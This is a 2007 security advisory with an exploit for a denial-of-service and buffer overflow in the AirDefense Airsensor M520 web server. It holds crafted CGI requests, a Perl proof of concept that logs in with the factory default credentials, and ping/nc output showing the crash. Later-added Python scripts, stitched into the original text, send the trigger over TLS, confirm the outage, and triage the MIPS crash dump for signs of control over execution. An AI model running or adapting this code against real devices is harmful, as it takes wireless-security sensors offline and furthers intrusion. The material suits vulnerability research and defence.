[EXPL] Airsensor M520 HTTPD Preauth DoS and Buffer Overflow (Exploit)

2007-10-01T00:00:00
ID SECURITYVULNS:DOC:18097
Type securityvulns
Reporter Securityvulns
Modified 2007-10-01T00:00:00

Description

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com - - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source. http://www.securiteam.com/mailinglist.html


Airsensor M520 HTTPD Preauth DoS and Buffer Overflow (Exploit)

SUMMARY

A vulnerability in the Airsensor M520 is caused by an unspecified error in the input filter of the CGI files used to configure device properties. This can be exploited by sending a specially crafted HTTPS request, which will cause the HTTPS service (the HTTPD thread) on the sensor to crash. Note that, despite the "preauth" in the title, the advisory states that authentication is necessary and the PoC below sends an Authorization header carrying the factory default credentials (admin:airsensor); unchanged default credentials are therefore part of the attack preconditions as described here.

DETAILS

Exploit:

#!/usr/bin/perl -w

Airsensor M520 HTTPD Remote Preauth Denial Of Service and Buffer Overflow PoC

The vulnerability is caused by an unspecified error in the input filter of the CGI files used to configure device properties. This can be exploited by sending a specially crafted HTTPS request (authentication is required; the PoC uses the factory default credentials), which will cause the HTTPS service on the system to crash.

Prerequisite: the "Use DHCP" option in the sensor's web interface must be set to "No".

Examples:

GET https://192.168.100.100/adLog.cgi?%41%41%41 HTTP/1.1

GET https://192.168.100.100/post.cgi?%41%41%41 HTTP/1.1

GET https://192.168.100.100/ad.cgi?%41%41%41 HTTP/1.1

Pinging:

Before:

Reply from 192.168.100.100: bytes=32 time<1ms TTL=64

Reply from 192.168.100.100: bytes=32 time<1ms TTL=64

Reply from 192.168.100.100: bytes=32 time<1ms TTL=64

After:

Hardware error.

Hardware error.

Hardware error.

Request timed out.

Request timed out.

Request timed out.

C:\>nc -vvn 192.168.100.100 443

(UNKNOWN) [192.168.100.100] 443 (?): connection refused

sent 0, rcvd 0: NOTSOCK
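The before/after check above (ping, then nc to port 443) can be scripted. The following is an added example, not part of the advisory or of the original PoC: it builds the same GET-with-Basic-auth request the Perl script sends (constructed here from the request examples above; the host, port and admin:airsensor credentials are the advisory's factory defaults and are assumptions for any other target), classifies a TCP connect to the HTTPS port as open / refused / timeout, matching the "connection refused" and "Request timed out" outputs shown, and wraps the probe around an arbitrary trigger so the state change is recorded. The self-test uses a local listener instead of a sensor; `send_over_tls` is not exercised offline, and a 2007-era TLS stack may additionally require lowering OpenSSL's security level on a modern client.

```python
import base64
import socket
import ssl


def build_request(path, host="192.168.100.100", credentials="admin:airsensor"):
    """Raw HTTP/1.1 request for one of the CGI targets from the advisory
    (e.g. "/adLog.cgi?%41%41%41"), with the Basic Authorization header the
    original PoC sends. Returned as bytes so it can be inspected or replayed."""
    token = base64.b64encode(credentials.encode()).decode()
    lines = [
        f"GET {path} HTTP/1.1",
        f"Host: {host}",
        f"Authorization: Basic {token}",
        "Connection: close",
        "",
        "",
    ]
    return "\r\n".join(lines).encode()


def probe_tcp(host, port, timeout=2.0):
    """Classify one TCP connect the way the advisory's nc/ping checks do:
    'open'    -> a listener answered (state before the crash)
    'refused' -> RST, nc's "connection refused" after the HTTPD thread died
    'timeout' -> no answer at all, the "Request timed out" case"""
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.settimeout(timeout)
    try:
        s.connect((host, port))
        return "open"
    except ConnectionRefusedError:
        return "refused"
    except (socket.timeout, TimeoutError):
        return "timeout"
    except OSError:
        return "unreachable"
    finally:
        s.close()


def send_over_tls(host, port, request, timeout=5.0):
    """Deliver a raw request over TLS without certificate verification (the
    sensor presents a self-signed certificate). Returns the bytes the sensor
    sent back, b"" if it dropped the connection. Not run by the self-test."""
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
    ctx.check_hostname = False          # must be cleared before verify_mode
    ctx.verify_mode = ssl.CERT_NONE
    ctx.minimum_version = ssl.TLSVersion.TLSv1  # old firmware, old TLS
    with socket.create_connection((host, port), timeout=timeout) as raw:
        with ctx.wrap_socket(raw, server_hostname=host) as tls:
            tls.sendall(request)
            chunks = []
            try:
                while True:
                    data = tls.recv(4096)
                    if not data:
                        break
                    chunks.append(data)
            except OSError:  # socket.timeout and ssl.SSLError both derive from OSError
                pass
            return b"".join(chunks)


def confirm_dos(host, port, trigger, timeout=2.0):
    """Probe the listener, run trigger(), probe again. Mirrors the advisory's
    manual before/after check; returns (state_before, state_after)."""
    before = probe_tcp(host, port, timeout)
    trigger()
    after = probe_tcp(host, port, timeout)
    return before, after


def start_local_listener():
    """Stand-in for the sensor's HTTPS port so the check can be run offline."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(1)
    return srv, srv.getsockname()[1]


if __name__ == "__main__":
    srv, port = start_local_listener()
    # Closing the listener plays the role of the crashing HTTPD thread.
    print(confirm_dos("127.0.0.1", port, srv.close))  # ('open', 'refused')
```

Against a real sensor the trigger would be `lambda: send_over_tls(host, 443, build_request("/adLog.cgi?%41%41%41"))`; the value of recording both states is that a "refused" after an "open" is the crash the advisory describes, while "timeout" on both sides usually means a firewall, not a result.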

Buffer Overflow debug log:

1970-01-01 00:00:15 SYS-INFO:: AirDefense Firmware Version 4.4.1.4, Model = M520
1970-01-01 00:00:15 SYS-CRIT:: SENSOR EXCEPTION ERROR
1970-01-01 00:00:15 SYS-CRIT:: SENSOR VERSION NUMBER: 4.4.1.4
1970-01-01 00:00:15 SYS-CRIT:: SENSOR Up Time: 00:08:51
1970-01-01 00:00:15 SYS-CRIT:: Time of Exception: 1970-01-01 00:08:55
1970-01-01 00:00:15 SYS-CRIT:: Exception ID = 10 ( Reserved Instruction)
1970-01-01 00:00:15 SYS-CRIT:: Thread = HTTPD
1970-01-01 00:00:15 SYS-CRIT:: MIPS Register Dump:
1970-01-01 00:00:15 SYS-CRIT:: zero=0x00000000 at=0xfffffffe v0=0x00000000 v1=0x00000000
1970-01-01 00:00:16 SYS-CRIT:: a0=0x00000000 a1=0x3d000000 a2=0x00000010 a3=0x00000041
1970-01-01 00:00:16 SYS-CRIT:: t0=0x00000000 t1=0x0000003d t2=0x0000000b t3=0x00000000
1970-01-01 00:00:16 SYS-CRIT:: t4=0x802f799c t5=0xf43dd40f t6=0x0066a1a4 t7=0x4df0e494
1970-01-01 00:00:16 SYS-CRIT:: s0=0x802f7dbf s1=0x0000001f s2=0x802f7910 s3=0x80120000
1970-01-01 00:00:16 SYS-CRIT:: s4=0x80120000 s5=0x80986c30 s6=0x80120000 s7=0x80128afc
1970-01-01 00:00:16 SYS-CRIT:: t8=0x480ec8cd t9=0x742b7136 k0=0x802f78c8 k1=0x802f7910
1970-01-01 00:00:16 SYS-CRIT:: gp=0x8015b070 sp=0x802f7910 fp=0x80128aec ra=0x800b2534
1970-01-01 00:00:16 SYS-CRIT:: Address of instruction that caused exception = 0x800b2534
1970-01-01 00:00:16 SYS-CRIT:: Memory address at which adress exception occured = 0x00000000
1970-01-01 00:00:16 SYS-CRIT:: Return address = 0x800b2534
1970-01-01 00:00:17 SYS-CRIT:: Status Reg = 0x1000af03
1970-01-01 00:00:17 SYS-CRIT:: Cache Reg = 0x00000000
1970-01-01 00:00:17 SYS-CRIT:: Cause Reg = 0x30000028
1970-01-01 00:00:17 SYS-CRIT:: Config Reg = 0x03fffbfb
1970-01-01 00:00:17 SYS-CRIT:: Vector = 40
1970-01-01 00:00:17 SYS-CRIT:: Processor Version = 0x00018009
1970-01-01 00:00:17 SYS-CRIT:: Stack Trace Begin: "->" = return address
1970-01-01 00:00:17 SYS-CRIT:: [802f7910]=0x802f7dbf
1970-01-01 00:00:17 SYS-CRIT:: [802f7914]=0x00000000
1970-01-01 00:00:17 SYS-CRIT:: [802f7918]=0x00000000
1970-01-01 00:00:19 SYS-CRIT:: [802f7990]=0x80130000
1970-01-01 00:00:19 SYS-CRIT:: [802f7994]=0x802f7db4
1970-01-01 00:00:19 SYS-CRIT:: [802f7998]=0x80152e18
1970-01-01 00:00:19 SYS-CRIT:: [802f799c]=0x80152ed8
1970-01-01 00:00:19 SYS-CRIT:: [802f79a0]=0x802f7dbf
1970-01-01 00:00:19 SYS-CRIT:: [802f79a4]=0x80986c30
1970-01-01 00:00:19 SYS-CRIT:: [802f79a8]=0x802f8200
1970-01-01 00:00:19 SYS-CRIT:: ->[802f79ac]=0x800f0450 <- return address
1970-01-01 00:00:19 SYS-CRIT:: [802f79b0]=0x0d0a0074
1970-01-01 00:00:21 SYS-CRIT:: Stack Trace End:
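A triage helper for the dump above, added here as an example (it is not part of the advisory, the PoC, or AirDefense's tooling). It parses the SYS-CRIT lines into a register file and stack words, cross-checks the Cause register's ExcCode (bits 6..2, standard MIPS encoding: 0x30000028 gives 10, RI) against the reported Exception ID, and flags what a reviewer looks for when deciding whether a crash is more than a denial of service: registers holding the payload byte (a3 = 0x41, the "A" from %41), EPC equal to ra, whether EPC lies in the firmware's KSEG0 image, and stack words that decode as request text ([802f79b0] = 0x0d0a0074 read big-endian is "\r\n\0t"). The log excerpt is copied from the dump above with the wrapped register lines re-joined and some stack lines omitted; the full dump parses the same way.

```python
import re

# Excerpt of the sensor's SYS-CRIT crash dump quoted in the advisory above.
SAMPLE_LOG = """\
1970-01-01 00:00:15 SYS-INFO:: AirDefense Firmware Version 4.4.1.4, Model = M520
1970-01-01 00:00:15 SYS-CRIT:: SENSOR EXCEPTION ERROR
1970-01-01 00:00:15 SYS-CRIT:: Exception ID = 10 ( Reserved Instruction)
1970-01-01 00:00:15 SYS-CRIT:: Thread = HTTPD
1970-01-01 00:00:15 SYS-CRIT:: MIPS Register Dump:
1970-01-01 00:00:15 SYS-CRIT:: zero=0x00000000 at=0xfffffffe v0=0x00000000 v1=0x00000000
1970-01-01 00:00:16 SYS-CRIT:: a0=0x00000000 a1=0x3d000000 a2=0x00000010 a3=0x00000041
1970-01-01 00:00:16 SYS-CRIT:: t0=0x00000000 t1=0x0000003d t2=0x0000000b t3=0x00000000
1970-01-01 00:00:16 SYS-CRIT:: s0=0x802f7dbf s1=0x0000001f s2=0x802f7910 s3=0x80120000
1970-01-01 00:00:16 SYS-CRIT:: gp=0x8015b070 sp=0x802f7910 fp=0x80128aec ra=0x800b2534
1970-01-01 00:00:16 SYS-CRIT:: Address of instruction that caused exception = 0x800b2534
1970-01-01 00:00:16 SYS-CRIT:: Return address = 0x800b2534
1970-01-01 00:00:17 SYS-CRIT:: Cause Reg = 0x30000028
1970-01-01 00:00:17 SYS-CRIT:: Stack Trace Begin: "->" = return address
1970-01-01 00:00:17 SYS-CRIT:: [802f7910]=0x802f7dbf
1970-01-01 00:00:19 SYS-CRIT:: [802f79a8]=0x802f8200
1970-01-01 00:00:19 SYS-CRIT:: ->[802f79ac]=0x800f0450 <- return address
1970-01-01 00:00:19 SYS-CRIT:: [802f79b0]=0x0d0a0074
1970-01-01 00:00:21 SYS-CRIT:: Stack Trace End:
"""

# Standard MIPS Cause.ExcCode values; 10 is Reserved Instruction.
MIPS_EXCCODE = {0: "Int", 1: "Mod", 2: "TLBL", 3: "TLBS", 4: "AdEL", 5: "AdES",
                6: "IBE", 7: "DBE", 8: "Sys", 9: "Bp", 10: "RI", 11: "CpU",
                12: "Ov", 13: "Tr"}

REG_RE = re.compile(r"(?<![\w\]])([a-z][a-z0-9]{0,3})=0x([0-9a-f]{8})")
STACK_RE = re.compile(r"(->)?\[([0-9a-f]{8})\]=0x([0-9a-f]{8})")
SCALARS = {  # single-valued fields, parsed as hex
    "epc": re.compile(r"caused exception = 0x([0-9a-f]+)"),
    "ra_reported": re.compile(r"Return address = 0x([0-9a-f]+)"),
    "cause": re.compile(r"Cause Reg = 0x([0-9a-f]+)"),
}


def parse_crash_log(text):
    """Turn the SYS-CRIT dump into a dict: firmware/model, thread, exception
    id and name, register file (name -> int), EPC, Cause and stack words."""
    report = {"regs": {}, "stack": []}
    for line in text.splitlines():
        body = line.split("::", 1)[-1].strip()     # drop the timestamp prefix
        m = re.search(r"Firmware Version ([^,]+), Model = (\S+)", body)
        if m:
            report["firmware"], report["model"] = m.group(1), m.group(2)
        m = re.search(r"Thread = (\S+)", body)
        if m:
            report["thread"] = m.group(1)
        m = re.search(r"Exception ID = (\d+) \(\s*([^)]*?)\s*\)", body)
        if m:
            report["exception_id"] = int(m.group(1))
            report["exception_name"] = m.group(2)
        for key, rx in SCALARS.items():
            m = rx.search(body)
            if m:
                report[key] = int(m.group(1), 16)
        for name, val in REG_RE.findall(body):
            report["regs"][name] = int(val, 16)
        m = STACK_RE.search(body)
        if m:
            report["stack"].append({"addr": int(m.group(2), 16),
                                    "value": int(m.group(3), 16),
                                    "is_return": bool(m.group(1))})
    return report


def _bytes_of(word):
    return [(word >> shift) & 0xFF for shift in (24, 16, 8, 0)]


def looks_like_text(word):
    """True if every byte is NUL, whitespace or printable ASCII and at least
    one is printable, i.e. the word is probably a fragment of the request."""
    bs = _bytes_of(word)
    allowed = all(b in (0, 9, 10, 13) or 0x20 <= b < 0x7F for b in bs)
    return allowed and any(0x20 <= b < 0x7F for b in bs)


def triage(report, payload_byte=0x41):
    """Indicators that separate a plain crash from possible control of execution."""
    regs = report["regs"]
    cause = report.get("cause")
    exccode = (cause >> 2) & 0x1F if cause is not None else None
    epc = report.get("epc")
    return {
        "exccode_from_cause": exccode,
        "exccode_name": MIPS_EXCCODE.get(exccode),
        "cause_matches_exception_id": exccode == report.get("exception_id"),
        "epc_equals_ra": epc is not None and epc == regs.get("ra"),
        "epc_in_kseg0": epc is not None and 0x80000000 <= epc < 0xA0000000,
        "regs_with_payload_byte": sorted(n for n, v in regs.items()
                                         if payload_byte in _bytes_of(v)),
        "regs_fully_payload": sorted(n for n, v in regs.items()
                                     if v == payload_byte * 0x01010101),
        "return_addresses": [f["value"] for f in report["stack"] if f["is_return"]],
        "text_like_stack_words": [(f["addr"], f["value"]) for f in report["stack"]
                                  if looks_like_text(f["value"])],
    }


if __name__ == "__main__":
    for key, val in triage(parse_crash_log(SAMPLE_LOG)).items():
        print(f"{key:28} {val}")
```

What the indicators say for this dump: a3 carries exactly one payload byte and no register is filled with 0x41414141, EPC equals ra, and the faulting address is inside the firmware's KSEG0 image rather than in attacker-supplied data. That is consistent with the overflow claim but does not by itself show a controlled jump; `regs_fully_payload` (or a return address on the stack made of payload bytes) is the indicator that would.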

The vulnerability has been reported in the following versions:

AirDefense Firmware Version 4.3.1.1, Model = M520

AirDefense Firmware Version 4.4.1.4, Model = M520

More information: http://www.airdefense.net

http://support.airdefense.net

Very special credits: str0ke, Kf, rathaous, !dsr, 0dd.

and friends: nitr0us, crypkey, dex, xdawn, sirdarckcat, kuza55,

pikah, codebreak, h3llfyr3

Alex Hernandez ahernandez [at] sybsecurity dot com

use strict;
use LWP::UserAgent;
use HTTP::Request;
use HTTP::Headers;

my $string  = "%41%41%41";                # Payload appended to the CGI query string
my $method  = 'GET';                      # Method "GET" or "POST"
my $uri     = 'https://192.168.100.100';  # Factory default IP address
# CGI file to crash; the other targets from the examples above are
# "/ad.cgi?", "/post.cgi?" and "/logout.cgi?" (one target per run)
my $content = "/adLog.cgi?";

my $headers = HTTP::Headers->new(
    # Header names carry no trailing colon; HTTP::Headers adds it when serialising
    'Host'            => '192.168.100.100',
    'User-Agent'      => 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6',
    'Accept'          => 'text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5',
    'Accept-Language' => 'en-us,en;q=0.5',
    'Accept-Charset'  => 'ISO-8859-1,utf-8;q=0.7,*;q=0.7',
    'Keep-Alive'      => '300',
    'Connection'      => 'keep-alive',
    'Referer'         => 'https://192.168.100.100/adLog.cgi?submitButton=refresh&refresh=Refresh',
    'Authorization'   => 'Basic YWRtaW46YWlyc2Vuc29y',  # base64 of admin:airsensor (factory default)
);

# HTTP::Request->new() takes (method, uri, headers, body): the CGI path and
# the payload are part of the request URI, not the body
my $request = HTTP::Request->new($method, $uri . $content . $string, $headers);

my $ua = LWP::UserAgent->new;
# The sensor presents a self-signed certificate; newer LWP verifies by default
$ua->ssl_opts(verify_hostname => 0) if $ua->can('ssl_opts');
my $response = $ua->request($request);

print "[+] Denial of Service exploit for Airsensor M520 Final\n";
print "[+] Coded by: Alex Hernandez [ahernandez\@sybsecurity.com]\n";
print "[+] We got this response from sensor: \n\n" . $response->content . "\n";

# Parse the response body as '&'-joined key=value pairs, as the original does
my %data;
foreach my $pair (split('&', $response->content)) {
    my ($k, $v) = split('=', $pair, 2);
    $data{$k} = $v if defined $k;
}

if (defined $data{RESULT} && $data{RESULT} != 0) {
    print "[+] Denial of Service exploit for Airsensor M520 Final\n";
    print "[+] Coded by: Alex Hernandez[ahernandez\@sybsecurity.com]\n";
    print "[+] Use:\n";
    print "\tperl -x dos_sensor.pl\n";
    print(($data{RESPMSG} || '') . "\n");
    exit(0);
} else {
    print "[+] Denial of service Exploit successed!!!\n";
    print "[+] By Alex Hernandez[ahernandez\@sybsecurity.com]\n";
}

milw0rm.com [2007-09-18]

ADDITIONAL INFORMATION

The information has been provided by <mailto:ahernandez@sybsecurity.com> Alex Hernandez.

========================================

This bulletin is sent to members of the SecuriTeam mailing list. To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================

DISCLAIMER: The information in this bulletin is provided "AS IS" without warranty of any kind. In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.